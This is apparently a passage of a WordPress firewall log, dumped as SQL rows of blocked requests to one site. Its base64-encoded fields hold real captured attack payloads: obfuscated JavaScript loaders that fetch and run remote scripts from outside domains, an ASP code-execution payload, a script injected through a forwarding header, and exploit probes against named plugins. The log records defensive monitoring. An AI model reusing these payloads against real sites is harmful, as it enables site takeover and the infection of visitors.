Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3Jjc3BfZGVzY3JpcHRpb25d\",\"paramValue\":\"PHNjcmlwdCAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9na2ViZ25iMHFnZHZsdz1TdHJpbmcuZnJvbUNoYXJDb2RlKDEwNC8qX2ZoaG54YTFxd2dqZzFjKi8sMTE2LyoqLywxMTYvKl9lZWVqbGYxeHJ2aGt4biovLDExMi8qX29nMXIyaXJwMGJ0dDUyKi8sMTE1LypfZWVlamxmMXhydmhreG4qLyw1OC8qX2ZoaG54YTFxd2dqZzFjKi8sNDcvKl9vZzFyMmlycDBidHQ1MiovLDQ3LypfZmhobnhhMXF3Z2pnMWMqLyw5OS8qX2drZWJnbmIwcWdkdmx3Ki8sMTAwLypfZWVlamxmMXhydmhreG4qLyw0Ni8qX29nMXIyaXJwMGJ0dDUyKi8sMTEyLypfZ2tlYmduYjBxZ2R2bHcqLywxMTQvKl9lZWVqbGYxeHJ2aGt4biovLDEwNS8qX2ZoaG54YTFxd2dqZzFjKi8sMTE4LypfZmhobnhhMXF3Z2pnMWMqLyw5Ny8qX2drZWJnbmIwcWdkdmx3Ki8sOTkvKiovLDEyMS8qX2VlZWpsZjF4cnZoa3huKi8sMTA4LyoqLywxMTEvKiovLDk5LypfZmhobnhhMXF3Z2pnMWMqLyw5Ny8qX2VlZWpsZjF4cnZoa3huKi8sMTE2LyoqLywxMDUvKl9na2ViZ25iMHFnZHZsdyovLDExMS8qX29nMXIyaXJwMGJ0dDUyKi8sMTEwLypfZmhobnhhMXF3Z2pnMWMqLywxMDIvKl9lZWVqbGYxeHJ2aGt4biovLDExMS8qX2drZWJnbmIwcWdkdmx3Ki8sMTE0Lypfb2cxcjJpcnAwYnR0NTIqLywxMDgvKl9maGhueGExcXdnamcxYyovLDExMS8qX2ZoaG54YTFxd2dqZzFjKi8sOTkvKiovLDQ2LyoqLyw5OS8qKi8sMTExLyoqLywxMDkvKl9na2ViZ25iMHFnZHZsdyovLDQ3LypfZ2tlYmduYjBxZ2R2bHcqLywxMTYvKl9vZzFyMmlycDBidHQ1MiovLDk3LyoqLywxMTIvKiovLDExMi8qX2drZWJnbmIwcWdkdmx3Ki8sMTAxLypfb2cxcjJpcnAwYnR0NTIqLywxMTQvKl9vZzFyMmlycDBidHQ1MiovLDQ2LypfZ2tlYmduYjBxZ2R2bHcqLywxMDYvKl9lZWVqbGYxeHJ2aGt4biovLDExNS8qX2VlZWpsZjF4cnZoa3huKi8sNjMvKl9na2ViZ25iMHFnZHZsdyovLDEwOS8qKi8sNjEvKiovLDEwOS8qX29nMXIyaXJwMGJ0dDUyKi8pO3ZhciBfb2cxcjJpcnAwYnR0NTIgPSBfZWVlamxmMXhydmhreG4oX2drZWJnbmIwcWdkdmx3KTtpZihfb2cxcjJpcnAwYnR0NTIubGVuZ3RoID4gMyl7X2w0bXA4ZWY1bDlmb25hKF9vZzFyMmlycDBidHQ1Mik7fSBmdW5jdGlvbiBfZWVlamxmMXhydmhreG4oX2Q1bDIzZ2s0NHhudnh5KXsgdmFyIF9maGhueGExcXdnamcxYyA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO19maGhueGExcXdnamcxYy5vcGVuKCBTdHJpbmcuZnJvbUNoYXJDb2RlKDcxLDY5LDg0KSwgX2Q1bDIzZ2s0NHhudnh5LCBmYWxzZSApO19maGhueGExcXdnamcxYy5zZW5kKCBudWxsICk7cmV0dXJuIF9maGhueGExcXdnamcxYy5yZXNwb25zZVRleHQ7fWZ1bmN0aW9uIF9sNG1wOGVmNWw5Zm9uYShfbmtleHVnZDZrcXJjOTQpeyB2YXIgX2txbWFzcjhpc2M0dGxxID0gbmV3IEZ1bmN0aW9uKCd4JywgJ3knLCBfbmtleHVnZDZrcXJjOTQrJyByZXR1cm4geCt5OycpO19rcW1hc3I4aXNjNHRscSgwLDApO308L3NjcmlwdD4=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37937,1571050970.219346,1571050968.405800,'\0\0\0\0\0\0\0\0\0\0ÿÿ¥ã0“',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2VtYWlsXQ==\",\"paramValue\":\"PHN2Zy9vbmxvYWQ9ZXZhbChTdHJpbmcuZnJvbUNoYXJDb2RlKDMyLDQwLDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCw0MSwzMiwxMjMsMTAsMzIsMzIsMzIsMzIsMTE4LDk3LDExNCwzMiwxMDEsMTA4LDEwMSwxMDksMzIsNjEsMzIsMTAwLDExMSw5OSwxMTcsMTA5LDEwMSwxMTAsMTE2LDQ2LDk5LDExNCwxMDEsOTcsMTE2LDEwMSw2OSwxMDgsMTAxLDEwOSwxMDEsMTEwLDExNiw0MCwzOSwxMTUsOTksMTE0LDEwNSwxMTIsMTE2LDM5LDQxLDU5LDMyLDEwLDksMTAxLDEwOCwxMDEsMTA5LDQ2LDExNiwxMjEsMTEyLDEwMSwzMiw2MSwzMiwzOSwxMTYsMTAxLDEyMCwxMTYsNDcsMTA2LDk3LDExOCw5NywxMTUsOTksMTE0LDEwNSwxMTIsMTE2LDM5LDU5LDMyLDEwLDMyLDMyLDMyLDMyLDEwMSwxMDgsMTAxLDEwOSw0NiwxMTUsMTE0LDk5LDMyLDYxLDMyLDM5LDEwNCwxMTYsMTE2LDExMiwxMTUsNTgsNDcsNDcsOTksMTAwLDQ2LDExMiwxMTQsMTA1LDExOCw5Nyw5OSwxMjEsMTA4LDExMSw5OSw5NywxMTYsMTA1LDExMSwxMTAsMTAyLDExMSwxMTQsMTA4LDExMSw5OSw0Niw5OSwxMTEsMTA5LDQ3LDk5LDExMSwxMTQsMTEwLDQ3LDEwMiwxMDgsMTAxLDEyMCw0NiwxMDYsMTE1LDYzLDExNiwxMTIsNjEsNTIsMzksNTksMTAsMzIsMzIsMzIsMzIsMTAwLDExMSw5OSwxMTcsMTA5LDEwMSwxMTAsMTE2LDQ2LDEwMywxMDEsMTE2LDY5LDEwOCwxMDEsMTA5LDEwMSwxMTAsMTE2LDExNSw2NiwxMjEsODQsOTcsMTAzLDc4LDk3LDEwOSwxMDEsNDAsMzQsMTA0LDEwMSw5NywxMDAsMzQsNDEsOTEsNDgsOTMsNDYsOTcsMTEyLDExMiwxMDEsMTEwLDEwMCw2NywxMDQsMTA1LDEwOCwxMDAsNDAsMTAxLDEwOCwxMDEsMTA5LDQxLDU5LDEwLDMyLDMyLDEyNSw0MSw0MCw0MSw1OSkpOz5AdGVzdC5jb20=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37990,1571334702.096337,1571334701.029600,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=test',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"dGVzdA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37975,1571334026.593306,1571334025.623500,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2VtYWlsXQ==\",\"paramValue\":\"PHN2Zy9vbmxvYWQ9ZXZhbChTdHJpbmcuZnJvbUNoYXJDb2RlKDMyLDQwLDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCw0MSwzMiwxMjMsMTAsMzIsMzIsMzIsMzIsMTE4LDk3LDExNCwzMiwxMDEsMTA4LDEwMSwxMDksMzIsNjEsMzIsMTAwLDExMSw5OSwxMTcsMTA5LDEwMSwxMTAsMTE2LDQ2LDk5LDExNCwxMDEsOTcsMTE2LDEwMSw2OSwxMDgsMTAxLDEwOSwxMDEsMTEwLDExNiw0MCwzOSwxMTUsOTksMTE0LDEwNSwxMTIsMTE2LDM5LDQxLDU5LDMyLDEwLDksMTAxLDEwOCwxMDEsMTA5LDQ2LDExNiwxMjEsMTEyLDEwMSwzMiw2MSwzMiwzOSwxMTYsMTAxLDEyMCwxMTYsNDcsMTA2LDk3LDExOCw5NywxMTUsOTksMTE0LDEwNSwxMTIsMTE2LDM5LDU5LDMyLDEwLDMyLDMyLDMyLDMyLDEwMSwxMDgsMTAxLDEwOSw0NiwxMTUsMTE0LDk5LDMyLDYxLDMyLDM5LDEwNCwxMTYsMTE2LDExMiwxMTUsNTgsNDcsNDcsOTksMTAwLDQ2LDExMiwxMTQsMTA1LDExOCw5Nyw5OSwxMjEsMTA4LDExMSw5OSw5NywxMTYsMTA1LDExMSwxMTAsMTAyLDExMSwxMTQsMTA4LDExMSw5OSw0Niw5OSwxMTEsMTA5LDQ3LDk5LDExMSwxMTQsMTEwLDQ3LDEwMiwxMDgsMTAxLDEyMCw0NiwxMDYsMTE1LDYzLDExNiwxMTIsNjEsNTIsMzksNTksMTAsMzIsMzIsMzIsMzIsMTAwLDExMSw5OSwxMTcsMTA5LDEwMSwxMTAsMTE2LDQ2LDEwMywxMDEsMTE2LDY5LDEwOCwxMDEsMTA5LDEwMSwxMTAsMTE2LDExNSw2NiwxMjEsODQsOTcsMTAzLDc4LDk3LDEwOSwxMDEsNDAsMzQsMTA0LDEwMSw5NywxMDAsMzQsNDEsOTEsNDgsOTMsNDYsOTcsMTEyLDExMiwxMDEsMTEwLDEwMCw2NywxMDQsMTA1LDEwOCwxMDAsNDAsMTAxLDEwOCwxMDEsMTA5LDQxLDU5LDEwLDMyLDMyLDEyNSw0MSw0MCw0MSw1OSkpOz5AdGVzdC5jb20=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37936,1571050976.329840,1571050975.406700,'\0\0\0\0\0\0\0\0\0\0ÿÿ¥ã0“',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2VtYWlsXQ==\",\"paramValue\":\"PHN2Zy9vbmxvYWQ9ZXZhbChTdHJpbmcuZnJvbUNoYXJDb2RlKDMyLDQwLDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCw0MSwzMiwxMjMsMTAsMzIsMzIsMzIsMzIsMTE4LDk3LDExNCwzMiwxMDEsMTA4LDEwMSwxMDksMzIsNjEsMzIsMTAwLDExMSw5OSwxMTcsMTA5LDEwMSwxMTAsMTE2LDQ2LDk5LDExNCwxMDEsOTcsMTE2LDEwMSw2OSwxMDgsMTAxLDEwOSwxMDEsMTEwLDExNiw0MCwzOSwxMTUsOTksMTE0LDEwNSwxMTIsMTE2LDM5LDQxLDU5LDMyLDEwLDksMTAxLDEwOCwxMDEsMTA5LDQ2LDExNiwxMjEsMTEyLDEwMSwzMiw2MSwzMiwzOSwxMTYsMTAxLDEyMCwxMTYsNDcsMTA2LDk3LDExOCw5NywxMTUsOTksMTE0LDEwNSwxMTIsMTE2LDM5LDU5LDMyLDEwLDMyLDMyLDMyLDMyLDEwMSwxMDgsMTAxLDEwOSw0NiwxMTUsMTE0LDk5LDMyLDYxLDMyLDM5LDEwNCwxMTYsMTE2LDExMiwxMTUsNTgsNDcsNDcsOTksMTAwLDQ2LDExMiwxMTQsMTA1LDExOCw5Nyw5OSwxMjEsMTA4LDExMSw5OSw5NywxMTYsMTA1LDExMSwxMTAsMTAyLDExMSwxMTQsMTA4LDExMSw5OSw0Niw5OSwxMTEsMTA5LDQ3LDk5LDExMSwxMTQsMTEwLDQ3LDEwMiwxMDgsMTAxLDEyMCw0NiwxMDYsMTE1LDYzLDExNiwxMTIsNjEsNTIsMzksNTksMTAsMzIsMzIsMzIsMzIsMTAwLDExMSw5OSwxMTcsMTA5LDEwMSwxMTAsMTE2LDQ2LDEwMywxMDEsMTE2LDY5LDEwOCwxMDEsMTA5LDEwMSwxMTAsMTE2LDExNSw2NiwxMjEsODQsOTcsMTAzLDc4LDk3LDEwOSwxMDEsNDAsMzQsMTA0LDEwMSw5NywxMDAsMzQsNDEsOTEsNDgsOTMsNDYsOTcsMTEyLDExMiwxMDEsMTEwLDEwMCw2NywxMDQsMTA1LDEwOCwxMDAsNDAsMTAxLDEwOCwxMDEsMTA5LDQxLDU5LDEwLDMyLDMyLDEyNSw0MSw0MCw0MSw1OSkpOz5AdGVzdC5jb20=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37930,1570952440.125612,1570952438.180500,'\0\0\0\0\0\0\0\0\0\0ÿÿ/',0,200,0,0,0,'https://bintara.com.my/blog/2018/12/11/logitech-rally/','https://bintara.com.my/blog/2018/12/11/logitech-rally/','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 OPR/54.0.2952.64','logged:waf','Watched IP Traffic: 5.8.47.2','{\"learningMode\":0,\"failedRules\":\"logged\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L2Jsb2cvMjAxOC8xMi8xMS9sb2dpdGVjaC1yYWxseS8=\",\"category\":\"logged\",\"ssl\":1}'),(37864,1569949940.309281,1569949938.987600,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php?action=update_zb_fbc_code',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2RvbWFpbl0=\",\"paramValue\":\"PC9zY3JpcHQ+PHNjcmlwdCAgIHR5cGU9dGV4dC9qYXZhc2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+dmFyIGMgPSAwO3ZhciBfYWFhYWFhYWFhYWFhYWFhPVN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LypfYWFhYWFhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWFhYWFhKi8sMTEyLyoqLywxMTUvKl9hYWFhYWFhYWFhYWFhYWEqLyw1OC8qX2FhYWFhYWFhYWFhYWFhYSovLDQ3LypfYWFhYWFhYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhYWFhYWEqLywxMDMvKl9hYWFhYWFhYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYWFhYWFhYSovLDExNS8qKi8sNDYvKl9hYWFhYWFhYWFhYWFhYWEqLyw5OC8qKi8sMTAxLypfYWFhYWFhYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYWFhYWEqLywxMTQvKl9hYWFhYWFhYWFhYWFhYWEqLyw5OC8qX2FhYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWFhYSovLDExOS8qKi8sOTcvKl9hYWFhYWFhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhYWEqLywxMDQvKl9hYWFhYWFhYWFhYWFhYWEqLywxMDEvKiovLDExNC8qX2FhYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWFhYSovLDQ2LypfYWFhYWFhYWFhYWFhYWFhKi8sOTkvKl9hYWFhYWFhYWFhYWFhYWEqLywxMTEvKiovLDEwOS8qX2FhYWFhYWFhYWFhYWFhYSovLDQ3LyoqLywxMDgvKl9hYWFhYWFhYWFhYWFhYWEqLywxMTEvKiovLDk5LypfYWFhYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhYWEqLywxMDgvKiovLDQ3LyoqLyw5OS8qX2FhYWFhYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYWFhYWFhKi8sMTE0LypfYWFhYWFhYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWFhYWFhYWEqLywxMDYvKl9hYWFhYWFhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhYWFhYWEqLyw2Myk7dmFyIF9hYWFhYWFhYWFhYWFhYWEgPSBfYWFhYWFhYWFhYWFhYWFhKF9hYWFhYWFhYWFhYWFhYWEpO2lmKF9hYWFhYWFhYWFhYWFhYWEubGVuZ3RoID4gMyl7X2FhYWFhYWFhYWFhYWFhYShfYWFhYWFhYWFhYWFhYWFhKTt9IGZ1bmN0aW9uIF9hYWFhYWFhYWFhYWFhYWEoX2FhYWFhYWFhYWFhYWFhYSl7IHZhciBfYWFhYWFhYWFhYWFhYWFhID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7X2FhYWFhYWFhYWFhYWFhYS5vcGVuKCBTdHJpbmcuZnJvbUNoYXJDb2RlKDcxLDY5LDg0KSwgX2FhYWFhYWFhYWFhYWFhYSwgZmFsc2UgKTtfYWFhYWFhYWFhYWFhYWFhLnNlbmQoIG51bGwgKTtyZXR1cm4gX2FhYWFhYWFhYWFhYWFhYS5yZXNwb25zZVRleHQ7fWZ1bmN0aW9uIF9hYWFhYWFhYWFhYWFhYWEodG9kbyl7IHZhciBfYWFhYWFhYWFhYWFhYWFhID0gbmV3IEZ1bmN0aW9uKCd4JywgJ3knLCB0b2RvKycgcmV0dXJuIHgreTsnKTtfYWFhYWFhYWFhYWFhYWFhKDAsMCk7fTwvc2NyaXB0PjxzY3JpcHQ+\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37888,1570544501.733697,1570544500.829600,'\0\0\0\0\0\0\0\0\0\0ÿÿw»äÎ',0,403,0,0,0,'http://bintara.com.my//base/admin/cache.asp','https://www.baidu.com','Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3JtYjIwMTRd\",\"paramValue\":\"RXhlY3V0ZSgiRXhlY3V0ZSgiIk9uIEVycm9yIFJlc3VtZSBOZXh0OlJlc3BvbnNlLkNsZWFyOkZ1bmN0aW9uIGJkKGJ5VmFsIHMpOkZvciBpPTEgVG8gTGVuKHMpIFN0ZXAgMjpjPU1pZChzLGksMik6SWYgSXNOdW1lcmljKE1pZChzLGksMSkpIFRoZW46RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyYiIiIiKSIiIiIpOkVsc2U6RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyZNaWQocyxpKzIsMikmIiIiIikiIiIiKTppPWkrMjpFbmQgSWYiIiZjaHIlKDEwKSYiIk5leHQ6RW5kIEZ1bmN0aW9uOlJlc3BvbnNlLldyaXRlKCIiIiItPnwiIiIiKTpFeGVjdXRlKCIiIiJPbiBFcnJvciBSZXN1bWUgTmV4dDoiIiIiJmJkKCIiIiI0NDY5NkQyMDUzM0E1MzNENTM2NTcyNzY2NTcyMkU0RDYxNzA3MDYxNzQ2ODI4MjIyRTIyMjkyNjYzNjg3MjI4MzkyOTNBNTM0NTU0MjA0MzNENDM3MjY1NjE3NDY1NEY2MjZBNjU2Mzc0MjgyMjUzNjM3MjY5NzA3NDY5NkU2NzJFNDY2OTZDNjU1Mzc5NzM3NDY1NkQ0RjYyNkE2NTYzNzQyMjI5M0E0OTY2MjA0NTcyNzIyMDU0Njg2NTZFM0E0NTcyNzIyRTQzNkM2NTYxNzIzQTQ1NkM3MzY1M0E0NjZGNzIyMDQ1NjE2MzY4MjA0NDIwNjk2RTIwNDMyRTQ0NzI2OTc2NjU3MzNBNTMzRDUzMjY0NDJFNDQ3MjY5NzY2NTRDNjU3NDc0NjU3MjI2NjM2ODcyMjgzNTM4MjkzQTRFNjU3ODc0M0E0NTZFNjQyMDQ5NjYzQTUyNjU3MzcwNkY2RTczNjUyRTU3NzI2OTc0NjUyODUzMjkiIiIiKSk6UmVzcG9uc2UuV3JpdGUoIiIiInw8LSIiIiIpOlJlc3BvbnNlLkVuZCIiKSIp\",\"path\":\"Ly9iYXNlL2FkbWluL2NhY2hlLmFzcA==\",\"category\":\"sqli\",\"ssl\":0}'),(37881,1570544470.234938,1570544469.369800,'\0\0\0\0\0\0\0\0\0\0ÿÿw»äÎ',0,403,0,0,0,'http://bintara.com.my//admin/images/Sql.asp','https://www.baidu.com','Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3JtYl0=\",\"paramValue\":\"RXhlY3V0ZSgiRXhlY3V0ZSgiIk9uIEVycm9yIFJlc3VtZSBOZXh0OlJlc3BvbnNlLkNsZWFyOkZ1bmN0aW9uIGJkKGJ5VmFsIHMpOkZvciBpPTEgVG8gTGVuKHMpIFN0ZXAgMjpjPU1pZChzLGksMik6SWYgSXNOdW1lcmljKE1pZChzLGksMSkpIFRoZW46RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyYiIiIiKSIiIiIpOkVsc2U6RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyZNaWQocyxpKzIsMikmIiIiIikiIiIiKTppPWkrMjpFbmQgSWYiIiZjaHIlKDEwKSYiIk5leHQ6RW5kIEZ1bmN0aW9uOlJlc3BvbnNlLldyaXRlKCIiIiItPnwiIiIiKTpFeGVjdXRlKCIiIiJPbiBFcnJvciBSZXN1bWUgTmV4dDoiIiIiJmJkKCIiIiI0NDY5NkQyMDUzM0E1MzNENTM2NTcyNzY2NTcyMkU0RDYxNzA3MDYxNzQ2ODI4MjIyRTIyMjkyNjYzNjg3MjI4MzkyOTNBNTM0NTU0MjA0MzNENDM3MjY1NjE3NDY1NEY2MjZBNjU2Mzc0MjgyMjUzNjM3MjY5NzA3NDY5NkU2NzJFNDY2OTZDNjU1Mzc5NzM3NDY1NkQ0RjYyNkE2NTYzNzQyMjI5M0E0OTY2MjA0NTcyNzIyMDU0Njg2NTZFM0E0NTcyNzIyRTQzNkM2NTYxNzIzQTQ1NkM3MzY1M0E0NjZGNzIyMDQ1NjE2MzY4MjA0NDIwNjk2RTIwNDMyRTQ0NzI2OTc2NjU3MzNBNTMzRDUzMjY0NDJFNDQ3MjY5NzY2NTRDNjU3NDc0NjU3MjI2NjM2ODcyMjgzNTM4MjkzQTRFNjU3ODc0M0E0NTZFNjQyMDQ5NjYzQTUyNjU3MzcwNkY2RTczNjUyRTU3NzI2OTc0NjUyODUzMjkiIiIiKSk6UmVzcG9uc2UuV3JpdGUoIiIiInw8LSIiIiIpOlJlc3BvbnNlLkVuZCIiKSIp\",\"path\":\"Ly9hZG1pbi9pbWFnZXMvU3FsLmFzcA==\",\"category\":\"sqli\",\"ssl\":0}'),(37761,1569949558.413599,1569949557.394400,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Newspaper Premium Theme <= 6.7.1 - Privilege Escalation','{\"learningMode\":0,\"failedRules\":\"91\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":1}'),(37851,1569949994.780960,1569949993.499800,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP Live Chat Support <= 8.0.28 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"147\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37875,1570276158.514188,1570276157.662300,'\0\0\0\0\0\0\0\0\0\0ÿÿÀ¤0',0,403,0,0,0,'https://bintara.com.my/wp-login.php','\"><script type=text/javascript src=\'https://js.balantfromsun.com/black.js?&tp=3\'></script>','???script type=text/javascript src=?https://js.balantfromsun.com/black.js?&tp=3???/script?','blocked:waf','Generic XSS Injection in IP Forwarding Headers','{\"learningMode\":0,\"failedRules\":\"59\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1gtRm9yd2FyZGVkLUZvcl0=\",\"paramValue\":\"Ij48c2NyaXB0IHR5cGU9dGV4dC9qYXZhc2NyaXB0IHNyYz0naHR0cHM6Ly9qcy5iYWxhbnRmcm9tc3VuLmNvbS9ibGFjay5qcz8mdHA9Myc+PC9zY3JpcHQ+\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"xss\",\"ssl\":1}'),(37873,1569950054.880801,1569950053.994600,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php?action=hc_ajax_save_option',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Hybrid Composer <= 1.4.5 - Unauthenticated Options Update','{\"learningMode\":0,\"failedRules\":\"154\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvbm9yZmFpei9wdWJsaWNfaHRtbC9iaW50YXJhLmNvbS5teS93cC1hZG1pbi9hZG1pbi1hamF4LnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37872,1569950041.367834,1569950040.183000,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP GDPR Compliance <= 1.4.2 - Update Any Option / Call Any Action','{\"learningMode\":0,\"failedRules\":\"120\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2FjdGlvbl0=\",\"paramValue\":\"d3BnZHByY19wcm9jZXNzX2FjdGlvbg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37894,1570544589.233734,1570544588.380700,'\0\0\0\0\0\0\0\0\0\0ÿÿw»äÎ',0,403,0,0,0,'http://bintara.com.my//images/cache.asp','https://www.baidu.com','Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','SQL 